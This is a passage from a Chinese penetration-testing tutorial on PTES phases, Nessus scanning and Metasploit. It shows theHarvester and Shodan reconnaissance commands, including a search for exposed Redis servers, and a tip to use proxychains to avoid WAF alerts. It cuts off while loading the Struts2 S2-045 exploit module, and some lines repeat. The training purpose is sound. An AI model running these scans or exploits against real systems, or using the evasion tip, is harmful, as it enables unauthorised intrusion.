网络攻防技术
3.1 渗透测试方法论(PTES/OSSTMM 实战落地)
PTES七阶段深度拆解
-
前期交互:
- 实战技巧:通过
theHarvester
自动化收集目标子域名与邮箱:theHarvester -d example.com -b google,linkedin -l 500 -f report.html
- 风险规避:使用
proxychains
代理扫描,避免触发目标WAF告警。
- 实战技巧:通过
-
威胁建模:
- 攻击面映射:基于Shodan结果筛选高危服务(如暴露的Jenkins、Redis):
shodan search 'port:6379 redis' --fields ip_str,port --limit 50
- 优先级划分:结合CVSS评分与业务影响(如数据库服务器 > 静态网站)。
- 攻击面映射:基于Shodan结果筛选高危服务(如暴露的Jenkins、Redis):
3.2 漏洞扫描与利用(Nessus + Metasploit 联动作业)
Nessus高级扫描配置
- 自定义策略模板:针对Web应用启用深度扫描插件(#11234 “OWASP Top 10”)。
- 结果过滤技巧:
SELECT * FROM vulnerabilities WHERE cvss_score >= 7.0 AND protocol = 'tcp'
Metasploit模块化利用
- Apache Struts S2-045漏洞利用:
msf6 > use exploit/multi/http/struts2_content_type_ognl msf6 exploit(struts2